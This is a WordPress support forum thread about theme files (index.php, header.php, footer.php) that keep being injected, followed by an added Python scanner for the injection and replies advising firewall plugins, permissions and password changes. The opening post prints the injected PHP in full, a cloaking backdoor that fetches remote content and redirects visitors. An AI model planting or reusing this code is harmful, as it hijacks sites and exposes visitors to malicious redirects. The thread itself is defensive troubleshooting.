Theme files keep getting injected with viral script

  • Hi there,

    I am pretty much stumped. One of my clients runs a WordPress blog and no matter what I do, I can’t keep it from getting hacked. I’ve updated all the plugins, deleted all unnecessary looking files from the server, he changes his FTP password once a week, yet he still keeps getting his files modified.

    It only happens in the theme folder, to either the index.php, header.php or footer.php files. This is the typical code that gets inserted:

    if ( !getenv("HTTP_COOKIE") && preg_match( "/^abstract=(.+)/", getenv("QUERY_STRING"), $m) ) { $qs_kw = $m[1]; 
    preg_match("/([0-9]+).([0-9]+).([0-9]+).([0-9]+)/", getenv("REMOTE_ADDR"), $arr);
     $a = $arr[1]; $b = $arr[2];
    $lst = ',38100,189221,61135,220181,174132,66230,7455,66102,20880,20383,97116,89122,3899,66232,19347,66231,66228,66212,61247,67195,86,72240,7214,74125,66249,6468,64233,21633,216239,20985,209185,202212,202160,203141,216109,216239,21632,6475,66163,66196,66228,6694,68142,7230,69147,6555,746,208111,6428,';
     if ( preg_match( "/,$a$b,/", $lst) ) {$remfl = implode('', file ("$qs_kw&pl=207&mt=r")); echo $remfl; exit;} 
     else { $rf = getenv("HTTP_REFERER");
    echo "<script>document.location=''+escape('$qs_kw')+'&fn='+escape(location.href)+'&dr='+escape('$rf')</script>"; exit;
    } }

    I’m wondering if it has to do with certain settings in his php.ini that I’m not catching. Anyone have any ideas?
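
A read-only check for the injection quoted in the post above, as an added example that is not part of the original thread: it flags theme PHP files that combine two or more of the snippet's traits. The trait names, the threshold of two and `SAMPLE` (an abbreviated copy of the posted snippet) are assumptions of this example.

```python
import re
import sys
from pathlib import Path

# Traits taken from the injected snippet quoted in the post. Each is unusual in
# a theme template; two or more in the same file is a strong signal.
TRAITS = {
    "cookie_gate": re.compile(r"getenv\(\s*['\"]HTTP_COOKIE['\"]\s*\)"),
    "query_string_trigger": re.compile(r"preg_match\([^;]*getenv\(\s*['\"]QUERY_STRING['\"]"),
    "visitor_ip_check": re.compile(r"getenv\(\s*['\"]REMOTE_ADDR['\"]\s*\)"),
    "remote_fetch": re.compile(r"\bfile\s*\(\s*[\"']?\$\w+"),
    "js_redirect": re.compile(r"echo\s+[\"']<script>\s*document\.location", re.I),
}

# Constructed sample: the posted snippet, abbreviated (IP list omitted).
SAMPLE = r'''<?php if ( !getenv("HTTP_COOKIE") && preg_match( "/^abstract=(.+)/", getenv("QUERY_STRING"), $m) ) { $qs_kw = $m[1];
preg_match("/([0-9]+).([0-9]+).([0-9]+).([0-9]+)/", getenv("REMOTE_ADDR"), $arr);
if ( preg_match( "/,$a$b,/", $lst) ) {$remfl = implode('', file ("$qs_kw&pl=207&mt=r")); echo $remfl; exit;}
else { echo "<script>document.location=''+escape('$qs_kw')</script>"; exit; } } ?>'''


def scan_text(text):
    """Return the sorted names of the traits present in one file's contents."""
    return sorted(name for name, rx in TRAITS.items() if rx.search(text))


def scan_theme(theme_dir, threshold=2):
    """Map relative path -> traits for each .php file with >= threshold traits."""
    root = Path(theme_dir)
    hits = {}
    for php in sorted(root.rglob("*.php")):
        found = scan_text(php.read_text(encoding="utf-8", errors="replace"))
        if len(found) >= threshold:
            hits[str(php.relative_to(root))] = found
    return hits


if __name__ == "__main__":
    # Usage: python scan_theme.py /path/to/wp-content/themes/<theme>
    for rel, found in scan_theme(sys.argv[1]).items():
        print(f"{rel}: {', '.join(found)}")
```

Run it from cron against the theme folder and compare the output over time; a file that starts matching was modified after the last clean run.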

Viewing 8 replies - 1 through 8 (of 8 total)
  • I don’t know, but maybe using some security plugins would prevent the hacking. WP-Firewall (free, google it), askapache password protect, login lockdown, etc.


    Make sure that the theme and plugins which you have installed on your blog are not vulnerable and are compatible with your host and blog configuration…

    Recursively assign 644 permissions to the theme directory of your blog.


    Shane G.

    I tried making the permission to the themes directory 644, but the CSS and images will not load unless the permissions are 755. Could that be the problem?

    How can I tell if a theme is vulnerable?

    Just FYI in case anyone has the same problem:

    I downloaded the WordPress Firewall as suggested by TransPersonal from and it works amazingly well. The site was getting “WordPress-Specific SQL Injection Attacks” and the firewall blocked them. Thanks!!!

    Hi lovablechelsey,

    I’m in a similar boat with you. My site was also attacked with a script mentioned here by another member:

    Read the member’s last post in that thread. The member stated that the script was hiding on their host’s server, and until it was deleted from the server it resurfaced on that person’s blog. Hope that might help, if the seoegghead doesn’t fix your challenge.



    Forum Moderator

    Who is the site hosted with? If it’s on a shared server, the weak link could be another site on the same server. Have you spoken to the hosting provider?

    The WordPress Firewall showed that the attack was being made through wp-admin/theme-editor.php, so once I changed the WordPress administrator’s password there have been no more attempts. Phew!

  • The topic ‘Theme files keep getting injected with viral script’ is closed to new replies.